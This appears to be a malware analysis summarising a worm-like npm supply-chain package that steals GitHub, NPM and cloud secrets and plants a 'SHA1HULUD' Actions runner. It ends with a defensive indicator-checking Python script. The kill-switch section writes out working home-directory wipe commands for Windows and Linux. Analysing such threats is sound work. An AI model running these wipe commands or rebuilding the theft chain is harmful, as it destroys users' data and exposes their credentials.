🟡 GitHub Persistence / Token Theft
🟡 AWS Credential Harvesting
🟡 GCP Secret Manager Theft
🟡 Azure Vault Secret Theft
🟡 DNS Hijack in GitHub Actions
🟡 Repo Creation as Exfil Channel
🟡 NPM Token Extraction
🟡 Local Secrets Scanning
🟡 Wipe-Your-Home-Directory Kill Switch
🟡 Firewall Manipulation
🟡 Actions Runner Dropper
🟡 "Bun" Installer Stub
🟡 TruffleHog Scanner (for extra secrets)

GitHub Actions Hijack
👩‍💻 installDnsHijackAndOpenFirewall()
⚙️ DNS manipulation + iptables flush
✅ Goal: force the GitHub runner into an attacker-controlled environment.

GitHub Token Theft + Repo as "C2"
👩‍💻 Exfiltration of all GitHub secrets: exfiltrateAllAccessibleSecrets()
⚙️ Reads the repo list → writes actionsSecrets.json to the repo
👩‍💻 Repo creation with runner backdoor: github.createRepo(secureId())
⚙️ Creates a repo
⚙️ Registers an Actions runner named "SHA1HULUD"

NPM Token Hijack
👩‍💻 Function: extractNpmToken()
⚙️ Searches for .npmrc in $HOME and the CWD

AWS Secret Theft
👩‍💻 Uses the official AWS SDK client

Google Cloud Secret Theft
👩‍💻 Uses @google-cloud/secret-manager

Azure Secret Theft
👩‍💻 Uses Azure Key Vault secrets

System Report + Environment Dump
👩‍💻 environmentDump = { environment: process.env }
⚙️ Exfiltrates all environment variables ("CICD Secret Dump")

Home Directory Secret Scanner
🔍 scanHomeForSecrets(github)
⚙️ Searches $HOME for files
⚙️ Uploads everything to the repo

Local Kill Switch (Data Destruction)
🗑 If it does not obtain any tokens, then:
🔷 Windows: del /F /Q /S "%USERPROFILE%*", rd /S /Q, cipher /W:%USERPROFILE%
🔲 Linux: find $HOME -type f -writable ... shred -uvz; find $HOME -empty -delete
⚠️ This is a complete wipe of the user's personal data.

TruffleHog Scanner for Extra Secrets
⌨️ The entire TruffleHog installer + binary downloader is contained in the script.
⚙️ Additionally scans the file system for API keys/passwords.

Bun Installer Dropper
👩‍💻 The large code block for installing bun + environment reload
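Added defender-side example, not code from the analysis above or from the malicious package: a small triage script that checks CI metadata for the indicators this summary names (the "SHA1HULUD" runner name, a committed actionsSecrets.json, a repo created under an opaque secureId() name, and a token-bearing .npmrc). The random-hex heuristic for secureId() names and all sample data are constructed assumptions, not values from the page.

```python
import re
from typing import Iterable

# Indicators taken from the capability summary above.
ROGUE_RUNNER_NAME = "SHA1HULUD"          # Actions runner label the script registers
EXFIL_FILE = "actionsSecrets.json"      # secrets dump written into the repo
# Assumption: secureId() produces an opaque hex-like repo name; flag long hex names.
RANDOM_REPO_NAME = re.compile(r"^[0-9a-f]{16,}$", re.IGNORECASE)
NPM_TOKEN_LINE = re.compile(r"_authToken\s*=", re.IGNORECASE)


def audit_runners(runners: Iterable[dict]) -> list[str]:
    """Flag self-hosted runners whose name matches the rogue label."""
    return [f"rogue runner: {r['name']} (id {r['id']})"
            for r in runners if r.get("name", "").upper() == ROGUE_RUNNER_NAME]


def audit_repos(repos: Iterable[dict]) -> list[str]:
    """Flag repos that look like exfil channels: opaque name or committed secrets dump."""
    findings = []
    for repo in repos:
        if RANDOM_REPO_NAME.match(repo["name"]):
            findings.append(f"random-named repo: {repo['name']}")
        if EXFIL_FILE in repo.get("files", []):
            findings.append(f"{EXFIL_FILE} committed in {repo['name']}")
    return findings


def audit_npmrc(npmrc_text: str) -> list[str]:
    """Warn when an .npmrc in the checkout or $HOME carries a publish token."""
    return ["npm auth token present in .npmrc"] if NPM_TOKEN_LINE.search(npmrc_text) else []


# Constructed sample data standing in for GitHub API responses and a checkout.
SAMPLE_RUNNERS = [{"id": 1, "name": "ubuntu-build-01"}, {"id": 2, "name": "SHA1HULUD"}]
SAMPLE_REPOS = [
    {"name": "payments-api", "files": ["package.json", "src/index.js"]},
    {"name": "3f9c1a7e52b04d6e8a1c", "files": ["actionsSecrets.json", "README.md"]},
]
SAMPLE_NPMRC = "registry=https://registry.npmjs.org/\n//registry.npmjs.org/:_authToken=${NPM_TOKEN}\n"


def run_audit() -> list[str]:
    """Run all three checks over the sample data and return the findings."""
    return audit_runners(SAMPLE_RUNNERS) + audit_repos(SAMPLE_REPOS) + audit_npmrc(SAMPLE_NPMRC)


if __name__ == "__main__":
    for finding in run_audit():
        print("[!]", finding)
```

In a real pipeline the runner list and repo contents would come from the GitHub API for the organisation under review, and the .npmrc check would run against the actual CI checkout and the runner's home directory.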